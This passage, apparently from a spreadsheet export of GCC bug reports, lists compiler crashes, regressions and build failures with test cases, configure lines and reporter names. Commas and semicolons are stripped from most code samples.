../../../libgo/go/bytes/bytes.go:10:9: error: /usr/lib/../lib64/libunicode.so exists but does not contain any Go export data
make[4]: *** [bytes/libbytes.a] Error 1
The problem is that the libgo build process sees the system libunicode.so which has nothing to do with go before seeing the go libunicode it built before.</t>
  </si>
  <si>
    <t>ian</t>
  </si>
  <si>
    <t>GCC-18912</t>
  </si>
  <si>
    <t>FW: gcc 3.3.1 for Powerpc optimzation flag -Os generates bad code</t>
  </si>
  <si>
    <t>I have been trying to run busybox-1.00  ( also rc3)   on my powerpc board (MPC 
8540 processor ) and about half
the applets do not run and die with the message Illegal instruction.  I have 
ppc_82xx-gcc Montavista compiler 
for the power pc board.  These compilers are cross compiled version of gcc 
3.3.1 compiler.  We are using the 
cross compiled glibc-2.3.2.
Some critical applets which are failing with Illegal instruction message are :
ar ash bunzip2 bzcat cat chgrp chown cmp cp cpio crond install ln ls mkdir tty 
wc cut date df du
egrep env expr fgrep find modprobe mount  rm rmdir route uname wget ftpget 
ftpput grep gunzip
halt head httpd id ifconfig inetd sh sort syslogd uniq xargs tee telnetd touch 
tr vi yes zcat.
About half the commands are broken.  When I compile with no optimization or 
optimize for speed i.e. -O2
instead for size -Os everything works fine. 
Seems like an optimzation bug to me.
--
Atul
The configure command for cross compiling gcc was as below ( output of
ppc_82xx-gcc -v ) ::
Reading specs from /opt/montavista/pro/devkit/ppc/82xx/bin/../lib/gcc-
lib/powerpc-hardhat-linux/3.3.1/specs
Configured with: ../configure --host=i686-pc-linux-gnu --target=powerpc-
hardhat-linux 
--prefix=/opt/montavista/devkit/ppc/82xx --exec-
prefix=/opt/montavista/devkit/ppc/82xx 
--bindir=/opt/montavista/devkit/ppc/82xx/bin --
sbindir=/opt/montavista/devkit/ppc/82xx/sbin 
--sysconfdir=/opt/montavista/devkit/ppc/82xx/etc --
datadir=/opt/montavista/devkit/ppc/82xx/share 
--includedir=/opt/montavista/devkit/ppc/82xx/include --
libdir=/opt/montavista/devkit/ppc/82xx/lib 
--libexecdir=/opt/montavista/devkit/ppc/82xx/libexec --
localstatedir=/opt/montavista/devkit/ppc/82xx/var 
--sharedstatedir=/opt/montavista/devkit/ppc/82xx/share --
mandir=/opt/montavista/devkit/ppc/82xx/man 
--infodir=/opt/montavista/devkit/ppc/82xx/info --program-transform-
name=s^ppc_82xx- --enable-cross 
--with-sysroot=/opt/montavista/devkit/ppc/82xx/target --enable-shared --enable-
languages=cc++ --enable-__cxa_atexit 
--enable-threads=posix --disable-multilib --with-gxx-include-
dir='$'{gcc_tooldir}/../target/usr/include/c++/3.3.1 
--with-cpu=603
Thread model: posix
gcc version 3.3.1 (MontaVista 3.3.1-3.0.10.0300532 2003-12-24)</t>
  </si>
  <si>
    <t>atul.sabharwal</t>
  </si>
  <si>
    <t>GCC-26500</t>
  </si>
  <si>
    <t>[4.2 Regression] info/gfortran.info is no longer being installed</t>
  </si>
  <si>
    <t>Current CVS trunk no longer installs $prefix/info/gfortran.info though
the Fortran frontend is being built and installed into $prefix/bin/gfortran
(so it's not an --enable-languages issues nor missing prerequisites).
FreeBSD 5.4 and makeinfo 4.6.</t>
  </si>
  <si>
    <t>GCC-61791</t>
  </si>
  <si>
    <t>[C++11] [constexpr] Additional overloads of std::real should be a constexpr function</t>
  </si>
  <si>
    <t>I think that the sample code below should be compiled successfully.
===========================================
#include 
static constexpr double d = std::real(10)
int main() {}
===========================================
Note that it is compiled successfully if the argument is std::complex(10) instead of 10.
According to C++11 standard 26.4.9[cmplx.over] paragraph 2 if either argument has type complex double or an integer type then both arguments are effectively cast to complex.
Therefore I think it should be compiled successfully too.</t>
  </si>
  <si>
    <t>kariya_mitsuru</t>
  </si>
  <si>
    <t>GCC-83977</t>
  </si>
  <si>
    <t>[8 Regression] ICE in simd_clone_clauses_extract at omp-simd-clone.c:184</t>
  </si>
  <si>
    <t>Changed between 20170924 and 20171008 :
$ cat z1.f90
integer function f(a b)
   integer :: a b
!$omp declare simd uniform(b) linear(ref(a):b)
   a = a + 1
!$omp parallel
   call sub
!$omp end parallel
end
$ gfortran-8-20170924 -c z1.f90 -fopenmp
$
$ gfortran-8-20180121 -c z1.f90 -fopenmp
during IPA pass: simdclone
z1.f90:8:0:
 end
internal compiler error: in simd_clone_clauses_extract at omp-simd-clone.c:184
0x1279348 simd_clone_clauses_extract
        ../../gcc/omp-simd-clone.c:183
0x1279348 expand_simd_clones
        ../../gcc/omp-simd-clone.c:1599
0x1279348 ipa_omp_simd_clone
        ../../gcc/omp-simd-clone.c:1690
0x1279348 execute
        ../../gcc/omp-simd-clone.c:1718</t>
  </si>
  <si>
    <t>gscfq</t>
  </si>
  <si>
    <t>GCC-17971</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] Invalid default parameter not diagnosed.</t>
  </si>
  <si>
    <t>Since PR 16929 got a little confusing I'm opening a new PR for the
following problem:
Since gcc 3.4.0 we accept the following invalid code snippet. The invalid
default parameter a is not even diagnosed at instantiation time.
(This is different from PT 17011 - also a spin-off from PR16929 -
which is just a QoI issue.)
===========================================
template struct A {}
template struct B
{
    A a
    void foo(A = a)
}
template struct B
===========================================
With 3.3.5 and before we got a decent error message:
bug.cc:7: error: invalid use of member `B::a'</t>
  </si>
  <si>
    <t>lerdsuwa</t>
  </si>
  <si>
    <t>GCC-17651</t>
  </si>
  <si>
    <t>[3.4 Regression] Erroneous preprocessor output with -g when generating dependencies</t>
  </si>
  <si>
    <t>When using -MM/-MT/-MF to generate dependencies then a preprocessor line of 
the form '# 1 /' is erroneously output to stdout if -g is also used.  
However the generated dependency file itself is ok.  This is a regression from 
3.3.4.
[marshals@itanic itanic]$ ~/slash342/usr/local/bin/g++ -v
Reading specs from /home/marshals/slash342/usr/local/lib/gcc/ia64-redhat-
linux/3.4.2/specs
Configured with: ../configure --prefix=/home/marshals/slash342/usr/local --
enable-languages=cc++ --enable-shared --enable-threads=posix --disable-
checking --with-system-zlib --enable-__cxa_atexit --host=ia64-redhat-linux
Thread model: posix
gcc version 3.4.2
[marshals@itanic itanic]$ ~/slash342/usr/local/bin/g++ -MM -MT ./bug2.o 
bug2.d -MF bug2.d -c bug2.cpp
[marshals@itanic itanic]$ ~/slash342/usr/local/bin/g++ -g -MM -MT ./bug2.o 
bug2.d -MF bug2-g.d -c bug2.cpp
# 1 /rvcarma/marshals/carma/itanic//
[marshals@itanic itanic]$ diff bug2.d bug2-g.d 
[marshals@itanic itanic]$ cat bug2.cpp
#include 
int main () {
        return 0
}
[marshals@itanic itanic]$</t>
  </si>
  <si>
    <t>neroden</t>
  </si>
  <si>
    <t>simon.marshall</t>
  </si>
  <si>
    <t>GCC-28801</t>
  </si>
  <si>
    <t>[4.2 Regression] libgcj build broken for gnu/CORBA/CDR/gnuRuntime.java</t>
  </si>
  <si>
    <t>Current svn trunk gives:
/home/mark/src/gcc-obj/gcc/gcj -B/home/mark/src/gcc-obj/i686-pc-linux-gnu/libjava/ -B/home/mark/src/gcc-obj/gcc/ -ffloat-store -fomit-frame-pointer -fclasspath= -fbootclasspath=/home/mark/src/gcc-obj/i686-pc-linux-gnu/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2 -fjni -findirect-dispatch -fno-indirect-classes -c @gnu-CORBA.list -fPIC -o .libs/gnu-CORBA.o
gnu/CORBA/CDR/gnuRuntime.java: In class 'gnu.CORBA.CDR.gnuRuntime$Redirection':
gnu/CORBA/CDR/gnuRuntime.java: In method 'gnu.CORBA.CDR.gnuRuntime$Redirection.toString()':
gnu/CORBA/CDR/gnuRuntime.java:95: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [gnu-CORBA.lo] Error 1
The same can be seen on the builder.classpath.org:
http://lists.gnu.org/archive/html/classpath-testresults/2006-08/msg00126.html
This doesn't happen on x86_64-unknown-linux-gnu.</t>
  </si>
  <si>
    <t>GCC-1617</t>
  </si>
  <si>
    <t>partial ordering of function templates</t>
  </si>
  <si>
    <t>current/deduce.ii:6: call of overloaded `Foo(int*&amp;)' is ambiguous
current/deduce.ii:1: candidates are: void Foo(T*) [with T = int]
current/deduce.ii:2:                 void Foo(T&amp;) [with T = int*]
but I think the first choice is more specialized than the second. 14.5.5.2
tells us to take each choice in turn synthesize a unique type for each
template type parameter into the function's parameter list and then try
type deduction using the other choice. The transformed template is at least
as specialized as the other if deduction succeeds and the deduced parameter
types are an exact match. In this case that gives us with a unique type
called 'X'
a: Foo (T *) -&gt; Foo (X *) using Foo (T &amp;) deduce T to be X * deduction succeeds.
b: Foo (T &amp;) -&gt; Foo (X &amp;) using Foo (T *) deduction fails
so b is less specialized than a and void Foo(T*) [with T = int] should
be selected
see http://gcc.gnu.org/ml/gcc-bugs/2001-01/msg00233.html
Release:
cvs 20010111</t>
  </si>
  <si>
    <t>GCC-15227</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 regression] Trouble with invalid function definition</t>
  </si>
  <si>
    <t>The following testcase (which is invalid as A::B doesn't exist)
causes trouble:
=============================================
template struct A {}
template void A::B::foo() {}
=============================================
GCC 2.95.3 correctly rejects the code
gcc 3.1 - 3.3.4 wrongly accept it
gcc 3.0.x 3.4.0 and mainline segfault.</t>
  </si>
  <si>
    <t>GCC-69888</t>
  </si>
  <si>
    <t>ICE: SIGSEGV in decide_alg (i386.c:26169) due to infinite (?) recursion with -minline-all-stringops -mmemset-strategy=no_stringop:-1:noalign</t>
  </si>
  <si>
    <t>Created attachment 37746
reduced testcase
Compiler output:
$ i686-pc-linux-gnu-gcc -march=geode -minline-all-stringops -mmemset-strategy=no_stringop:-1:noalign testcase.c -wrapper gdb-q--args
(gdb) r
Starting program: /repo/gcc-trunk/binary-trunk-233588-checking-yes-rtl-df-nographite-i686/libexec/gcc/i686-pc-linux-gnu/6.0.0/cc1 -quiet -iprefix /repo/gcc-trunk/binary-trunk-233588-checking-yes-rtl-df-nographite-i686/bin/../lib/gcc/i686-pc-linux-gnu/6.0.0/ testcase.c -quiet -dumpbase testcase.c -march=geode -minline-all-stringops -mmemset-strategy=no_stringop:-1:noalign -auxbase testcase -o /tmp/cc5XYtj5.s
testcase.c:2:1: warning: return type defaults to 'int' [-Wimplicit-int]
 foo (v32u16 v32u16_1)
 ^~~
testcase.c: In function 'foo':
testcase.c:2:1: note: The ABI for passing parameters with 32-byte alignment has changed in GCC 4.6
testcase.c:2:1: warning: AVX vector argument without AVX enabled changes the ABI [-Wpsabi]
Program received signal SIGSEGV Segmentation fault.
0x0000000000ecb8bd in decide_alg (count=count@entry=32 expected_size=2048 min_size=min_size@entry=32 max_size=max_size@entry=32 
    memset=memset@entry=true zero_memset=zero_memset@entry=true have_as=false dynamic_check=0x7fffffffc5bc noalign=0x7fffffffc5bb)
    at /repo/gcc-trunk/gcc/config/i386/i386.c:26034
26034   {
(gdb) bt
#0  0x0000000000ecb8bd in decide_alg (count=count@entry=32 expected_size=2048 min_size=min_size@entry=32 max_size=max_size@entry=32 
    memset=memset@entry=true zero_memset=zero_memset@entry=true have_as=false dynamic_check=0x7fffffffc5bc noalign=0x7fffffffc5bb)
    at /repo/gcc-trunk/gcc/config/i386/i386.c:26034
#1  0x0000000000ecbcb4 in decide_alg (count=count@entry=32 expected_size=2048 min_size=min_size@entry=32 max_size=max_size@entry=32 
    memset=memset@entry=true zero_memset=zero_memset@entry=true have_as=false dynamic_check=0x7fffffffc5bc noalign=0x7fffffffc5bb)
    at /repo/gcc-trunk/gcc/config/i386/i386.c:26169
#2  0x0000000000ecbcb4 in decide_alg (count=count@entry=32 expected_size=2048 min_size=min_size@entry=32 max_size=max_size@entry=32 
    memset=memset@entry=true zero_memset=zero_memset@entry=true have_as=false dynamic_check=0x7fffffffc5bc noalign=0x7fffffffc5bb)
    at /repo/gcc-trunk/gcc/config/i386/i386.c:26169
...
$ i686-pc-linux-gnu-gcc -v                                                      
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-i686/bin/i686-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-233588-checking-yes-rtl-df-nographite-i686/bin/../libexec/gcc/i686-pc-linux-gnu/6.0.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=i686-pc-linux-gnu --with-ld=/usr/bin/i686-pc-linux-gnu-ld --with-as=/usr/bin/i686-pc-linux-gnu-as --with-sysroot=/usr/i686-pc-linux-gnu --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-233588-checking-yes-rtl-df-nographite-i686
Thread model: posix
gcc version 6.0.0 20160220 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-81354</t>
  </si>
  <si>
    <t>[5/6 Regression] Segmentation fault in SSA Strength Reduction using -O3</t>
  </si>
  <si>
    <t>The following is a complete testcase:
 struct T { double a double b }
 void foo(T Ad[] int As[2])
 {
  int j
  int i
  int Bs[2] = {00}
  T Bd[16]
  for (j = 0 j &lt; 4 j++) {
    for (i = 0 i + 1 &lt;= j + 1 i++) {
      Ad[i + As[0] * j] = Bd[i + Bs[0] * j]
    }
    i = j + 1  // &lt;- comment out this line and it does not crash
    for ( i + 1 &lt; 5 i++) {
      Ad[i + As[0] * j].a = 0.0
      Ad[i + As[0] * j].b = 0.0
    }
  }
 }
This crashes when compiled as follows:
$ g++ -c test.cpp -O3
test.cpp: In function â€˜void foo(T* int*)â€™:
test.cpp:3:6: internal compiler error: Segmentation fault
 void foo(T Ad[] int As[2])
      ^
0xaf6acf crash_signal
        ../../gcc/toplev.c:383
0xfef7b0 record_phi_increments
        ../../gcc/gimple-ssa-strength-reduction.c:2590
0xfef795 record_phi_increments
        ../../gcc/gimple-ssa-strength-reduction.c:2601
0xfef8f9 record_increments
        ../../gcc/gimple-ssa-strength-reduction.c:2638
0xff1e02 analyze_candidates_and_replace
        ../../gcc/gimple-ssa-strength-reduction.c:3594
0xff1e02 execute
        ../../gcc/gimple-ssa-strength-reduction.c:3681
This is in GCC 5.4.0 on Linux x86_64 (SuSE 11).
Removing the line:
  i = j + 1  // &lt;- comment out this line and it does not crash
[which leaves the code functionally equivalent] removes the crash. Dropping down to -O2 or turning on -fno-strict-aliasing also removes the crash.</t>
  </si>
  <si>
    <t>wschmidt</t>
  </si>
  <si>
    <t>jgrossma</t>
  </si>
  <si>
    <t>GCC-42946</t>
  </si>
  <si>
    <t>[4.5 Regression] bootstrap with --enable-checking=df (or =all) fails</t>
  </si>
  <si>
    <t>r156431
cc1: warnings being treated as errors
/mnt/svn/gcc-trunk/gcc/df-core.c: In function 'df_finish_pass':
/mnt/svn/gcc-trunk/gcc/df-core.c:649:3: error: enum conversion in assignment is invalid in C++
The offending code is:
#ifdef ENABLE_DF_CHECKING
  saved_flags = df-&gt;changeable_flags
#endif
where operands are declared as:
  enum df_changeable_flags saved_flags
  int changeable_flags : 8</t>
  </si>
  <si>
    <t>GCC-48778</t>
  </si>
  <si>
    <t>gcc 4.6 -Waddress adds unhelpful new warning case when using from a macro</t>
  </si>
  <si>
    <t>Using built-in specs.
COLLECT_GCC=/usr/bin/gcc-4.6
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i486-linux-gnu/4.6.1/lto-wrapper
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.0-2' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-gold --enable-ld=default --with-plugin-ld --enable-objc-gc --enable-targets=all --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.6.1 20110329 (prerelease) (Debian 4.6.0-2) 
Consider this test file:
#include 
typedef struct buf {
        size_t len
        char *stuff
} buf
#define buflen(b) ((b) == NULL ? 0 : (b)-&gt;len)
int
func()
{
        buf b
        b.len = 5
        b.stuff = malloc(5)
        if (buflen(&amp;b) &gt; 0)
                return 1
        else
                return 0
}
This compiles without warnings with -Wall on gcc &lt;=4.5.  But
gcc-4.6 -c -Waddress test.c
test.c: In function â€˜funcâ€™:
test.c:18:12: warning: the comparison will always evaluate as â€˜falseâ€™ for the address of â€˜bâ€™ will never be NULL [-Waddress]
I don't think this is really helpful.  Macros like in the above example are not uncommon and there is no obvious way to write the code better.</t>
  </si>
  <si>
    <t>GCC-48120</t>
  </si>
  <si>
    <t>libpwl test must use g++</t>
  </si>
  <si>
    <t>The libpwl test in toplevel configure is bogus: it tries to link with gcc but
libpwl is a C++ library and needs symbols from libstdc++ as can be seen in this
excerpt from config.log of a failing bootstrap:
configure:5755: gcc -o conftest -g -O2   -L/vol/gcc/lib conftest.c -lpwl   &gt;&amp;5
Undefined                       first referenced
 symbol                             in file
std::basic_string std::allocator &gt;::basic_st
ring(std::basic_string std::allocator &gt; cons
t&amp;) /vol/gcc/lib/libpwl.a(Watchdog.o)
operator new(unsigned int)          /vol/gcc/lib/libpwl.a(Watchdog.o)</t>
  </si>
  <si>
    <t>ro</t>
  </si>
  <si>
    <t>GCC-18537</t>
  </si>
  <si>
    <t>no warning about tabs with std=f95 option</t>
  </si>
  <si>
    <t>Tabs in source code are not standard Fortran but are accepted by many 
compilers. Gfortran should at least warn about the use of tabs when invoked 
with the -std=f95 option. The Compaq Visual Fortran and Intel compilers do so.</t>
  </si>
  <si>
    <t>vivekrao4</t>
  </si>
  <si>
    <t>GCC-52706</t>
  </si>
  <si>
    <t>[C++11] Demangling of templates with std::nullptr_t as non-type parameter</t>
  </si>
  <si>
    <t>gcc 4.8.0 20120318 (experimental) has problems to correctly demangle templates with a non-type template parameter of std::nullptr_t. The following example:
//---
template
struct W {
  template&lt;class U
    decltype(nullptr) = nullptr
    //bool = false // OK
  &gt;
  W(U
}
template
int f(T)
W w1 = 0
W w2 = nullptr // 14
int i1 = f(0)
int i2 = f(nullptr) // 17
//---
produces link error messages as follows:
13|undefined reference to `W::W(int&amp;&amp;)'
14|undefined reference to `_ZN1WIPiEC1IDnLS3_0EEEOT_'|
16|undefined reference to `int f(int)'|
17|undefined reference to `_Z1fIDnLS0_0EEiT_'
The problem seems to occur if there is at least one further template parameter because
template
int g()
int i3 = g()
correctly produces:
undefined reference to `int g()'</t>
  </si>
  <si>
    <t>daniel.kruegler</t>
  </si>
  <si>
    <t>GCC-52140</t>
  </si>
  <si>
    <t>Libdfp testcase encounters ICE when compiled with soft-dfp (no -mcpu).</t>
  </si>
  <si>
    <t>The following Libdfp test-case produces an ICE on PowerPC when compiled w/o -mcpu (implies soft-dfp) and -O1 or greater optimization:
#ifndef __STDC_WANT_DEC_FP__
#define __STDC_WANT_DEC_FP__
#endif
int
foo (_Decimal64 x _Decimal64 y)
{
  /* This is known to cause a GCC ICE when libdfp is compiled w/o -mcpu and -O1
     optimization level or greater.  */
  return (x  y)
}
int main(void)
{
  int ret = -1
  _Decimal64 a = 12.45DD
  _Decimal64 b = 12.43DD
  ret = foo (ab)
  return 0
}
/opt/at4.0/bin/gcc -v:
Using built-in specs.
COLLECT_GCC=/opt/at4.0/bin/gcc
COLLECT_LTO_WRAPPER=/opt/at4.0/libexec/gcc/powerpc64-linux/4.5.4/lto-wrapper
Target: powerpc64-linux
Configured with: /home/cseo/at4.0/at4.0-5/src/gcc/configure --build=powerpc64-linux --host=powerpc64-linux --target=powerpc64-linux --with-cpu=default64 --prefix=/opt/at4.0 --with-long-double-128 --enable-decimal-float --enable-secureplt --enable-threads=posix --enable-languages=cc++fortran --enable-__cxa_atexit --enable-shared --enable-checking --enable-lto --enable-gnu-indirect-function --with-gmp-include=/opt/at4.0/include --with-gmp-lib=/opt/at4.0/lib64 --with-mpfr-include=/opt/at4.0/include --with-mpfr-lib=/opt/at4.0/lib64 --with-mpc-include=/opt/at4.0/include --with-mpc-lib=/opt/at4.0/lib64 --with-ppl-include=/opt/at4.0/include --with-ppl-lib=/opt/at4.0/lib64 --with-cloog-include=/opt/at4.0/include --with-cloog-lib=/opt/at4.0/lib64 --with-libelf-include=/opt/at4.0/include --with-libelf-lib=/opt/at4.0/lib64 --with-host-libstdcxx='-L/opt/at4.0/lib64 -lstdc++ -lsupc++ -lppl -lppl_c -lpwl -lgmp -lgmpxx' --with-cpu=power4 --with-tune=power6
Thread model: posix
gcc version 4.5.4 20110524 (Advance-Toolchain-4.0-5) [ibm/gcc-4_5-branch revision 179810] (GCC)
/opt/at4.0/bin/gcc  -DSHARED -O2 -fpic -g -m32   -c ../tests/test-GCC-PR.c -D__STDC_DEC_FP__=200704L -D__STDC_WANT_DEC_FP__=1 -DOPTION_EGLIBC_LOCALE_CODE=1 -D_POSIX_C_SOURCE=200809L -std=gnu99 -D_SVID_SOURCE -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -Wno-long-long -include ../include/libdfp-symbols.h -include ./config.h  -I../include  -I../dfp  -I../dfp/decimal  -I../libdecnumber/dpd  -I../libdecnumber  -I../sysdeps/powerpc/powerpc32  -I../sysdeps/powerpc/fpu/bits  -I../sysdeps/powerpc/fpu  -I../sysdeps/powerpc  -I../sysdeps/soft-dfp/dpd  -I../sysdeps/soft-dfp  -I../sysdeps/dpd  -I../decNumberMath/  -I../ieee754/  -I../base-math/  -I..  -I.  -o test-GCC-PR.os
../tests/test-GCC-PR.c:30:1: warning: no previous prototype for 'foo'
../tests/test-GCC-PR.c: In function 'foo':
../tests/test-GCC-PR.c:34:3: internal compiler error: in prepare_float_lib_cmp at optabs.c:4414
I've attached the test-GCC-PR.i and test-GCC-PR.s files generated with --save-temps.</t>
  </si>
  <si>
    <t>bergner</t>
  </si>
  <si>
    <t>rsa</t>
  </si>
  <si>
    <t>GCC-38040</t>
  </si>
  <si>
    <t>-O2 -fgraphite-identity causes ICE compiling capacita.f90 Polyhedron 2005 benchmark</t>
  </si>
  <si>
    <t>When compiling the capacita.f90 Polyhedron 2005 benchmark with -O2 -fgraphite-identity using current gcc trunk the gfortran compiler ICEs with the following error...
capacita.f90: In function â€˜precoâ€™:
capacita.f90:11: error: type mismatch between an SSA_NAME and its symbol
capacita.f90:11: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This ICE doesn't occur with -O1 -fgraphite-identity.</t>
  </si>
  <si>
    <t>howarth.at.gcc</t>
  </si>
  <si>
    <t>GCC-38259</t>
  </si>
  <si>
    <t>Add version number to .mod file</t>
  </si>
  <si>
    <t>Currently there are only strange parenthesis-related error messages given if an old incompatible .mod file is used with a newer compiler e.g.
Fatal Error: Reading module mmm at line 16 column 65: Expected left parenthesis
(cf. also PR 38248). The solution is to add a version number which is always bumped if a .mod related change happened which presumably was the case for all new GCC/gfortran releases.</t>
  </si>
  <si>
    <t>GCC-81105</t>
  </si>
  <si>
    <t>ada</t>
  </si>
  <si>
    <t>system-freebsd-x86.ads renamed but referenced by gcc/ada/gcc-interface/Makefile.in</t>
  </si>
  <si>
    <t>Created attachment 41557
Fix 3 remaining symlinks
system-freebsd-x86.ads has been renamed to system-freebsd.ads but gcc/ada/gcc-interface/Makefile.in creates symlinks targeting the old name.
These changes have probably been forgotten in https://gcc.gnu.org/git/?p=gcc.gita=commitdiffh=0ba160150e66955c3568ef99642b8cc6d4d8ea3f.
See https://bugs.debian.org/861735 or https://bugs.debian.org/861737 for implied build failures.</t>
  </si>
  <si>
    <t>GCC-16810</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Legal C++ program with cast gives ICE in build_ptrmemfunc</t>
  </si>
  <si>
    <t>The following C++ program will not compile with g++ versions 3.4.1 or 3.5
I tried the ia64-hp-hpux11.22 platform as well as hppa-hp-hpux11.00.
struct C {
    virtual void f() {}
}
struct B {virtual ~B() {} }
class D : public B public C
{
public:
    virtual void f() {}
}
typedef void ( C::*FP)()
typedef void ( D::*D_f)()
int main() {
  D *d = new D()
  C *c = d
  const FP fptr = (FP) 
  (d-&gt;* (D_f)fptr)()
}
-----------------------------------
/usr/local/bin/g++ -c x.C
x.C: In function `int main()':
x.C:21: internal compiler error: in build_ptrmemfunc at cp/typeck.c:5512
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>sje</t>
  </si>
  <si>
    <t>GCC-65609</t>
  </si>
  <si>
    <t>std::sort is suboptimal</t>
  </si>
  <si>
    <t>std::sort will call the compare function with the same object which can cause severe performance problems.  This shows up in parallel_sort (both Intel's TBB and __gnu_parallel's version) and on multiple OS's (Mac OS CentOS) and multiple versions of the compiler. qsort doesn't exhibit this behavior.
g++ (GCC) 4.4.7 20120313 (Red Hat 4.4.7-11)
In the following example as the length of string s gets larger and larger the number of times s1 == s2 in the compare function increases rapidly.  Since the two pointers are equal it leads to having compare nearly the entire string (even though they are equal).
#include 
#include 
#include 
#include 
#include 
bool comp(char const *s1 char const *s2)
   {
   if (s1 == s2)
      std::cout &lt;&lt; This is a bug s1 should not equal s2 &lt;&lt;std::endl
   return strcmp(s1s2) &lt; 0
   }
int main(int argc char **argv)
   {
   std::string s = AABAABAABAABAABABAAABAABBBAAA
   std::vector v
   for (uint32_t x = 0 x &lt; s.size() ++x)
      v.push_back(s.data() + x)
   std::sort(v.begin() v.end() comp)
   return 0
   }</t>
  </si>
  <si>
    <t>jdcoxm3</t>
  </si>
  <si>
    <t>GCC-61047</t>
  </si>
  <si>
    <t>[5 Regression] wrong code at -O1 on x86_64-linux</t>
  </si>
  <si>
    <t>The current gcc trunk and 4.9.0 mis-compile the following code on x86_64-linux at -O1 in both 32-bit and 64-bit modes. 
This is a regression from 4.8.x and seems related to http://gcc.gnu.org/bugzilla/show_bug.cgi?id=60452. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.10.0 20140503 (experimental) [trunk revision 210026] (GCC) 
$ 
$ gcc-trunk -O0 small.c a.out
$ gcc-trunk -Os small.c a.out
$ gcc-4.8.2 -O1 small.c a.out
$ 
$ gcc-trunk -O1 small.c
$ a.out
Segmentation fault (core dumped)
$ gcc-4.9.0 -O1 small.c
$ a.out
Segmentation fault (core dumped)
$ 
---------------------
int a c d
short b
int
main ()
{
  int e[1]
  for ( b &lt; 2 b++)
    {
      a = 0
      if (b == 2837)
        a = e[b]
      if (!(d || b))
        for ( c)
    }
  return 0
}</t>
  </si>
  <si>
    <t>su</t>
  </si>
  <si>
    <t>GCC-1879</t>
  </si>
  <si>
    <t>Internal compiler error in fix_lexical_addr at function.c:5320</t>
  </si>
  <si>
    <t>I'm trying to compile POSE the Palm OS Emulator for Linux.
This is the latest version from www.palmos.com.  The fltk
is required and is available from www.fltk.org.
../SrcShared/UAE/newcpu.h: In function `void 
MetaMemory::GWH_ExamineChunk (const EmPalmChunk &amp; 
MetaMemory::WhatHappenedData &amp;)':
../SrcShared/UAE/newcpu.h:225: Internal compiler error in 
fix_lexical_addr at function.c:5320
Please submit a full bug report.
See  for instructions.
make[1]: *** [MetaMemory.o] Error 1
make[1]: Leaving directory `/home/brian/palmdev/pose/Emulator_Src_3.0a8/BuildUnix'
make: *** [all-recursive] Error 1
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Not sure what affects gcc exactly:
Thinkpad 770ED laptop running RedHat 7.0 stock gcc
128MB RAM
14GB HD with about 11GB free
How-To-Repeat:
I'm not much of a gcc user.  The command line above seems
to repeat the problem on my system with the files present
in the -save-temps file attached.</t>
  </si>
  <si>
    <t>w_brian_blevins</t>
  </si>
  <si>
    <t>GCC-5036</t>
  </si>
  <si>
    <t>Internal compiler error in gcc-2.95.4.  gcc-3.0 gives syntax errors</t>
  </si>
  <si>
    <t>Description:
&gt;  When I compile my C++ code (ACEDistribution.cpp or any of several related
&gt; files) using gcc 2.95.4 I get this message:
&gt; ACEDistribution.cpp: In method `ACEDistribution::ACEDistribution(int BBoxList &amp;)':
&gt; ACEDistribution.cpp:30: Internal compiler error.
&gt; ACEDistribution.cpp:30: Please submit a full bug report.
&gt; ACEDistribution.cpp:30: Internal compiler error:
&gt; ACEDistribution.cpp:30: See  for instructions.
&gt; When I compile it under gcc 3.0.2 I get many error messages that sya
&gt; syntax error before &amp; token.  Many of these errors are related to typedefs
&gt; that use things like istream and ostream from
&gt; iostream.h (or iostream in the new ISO C++).
&gt; This was valid code under gcc 2.95.   I understand that you've adopted the
&gt; ISO standard for 3.0 but... I should still be able to compile my existing
&gt; code somehow right?  I notice that there appears to be some attempt towards
&gt; backwards-compatibility in that the header files gcc-3.0 is using are in
&gt; some /usr/include/g++-v3/backward/ but this is apparently not having the
&gt; desired effect..
Attached is the preprocessor file generated via 
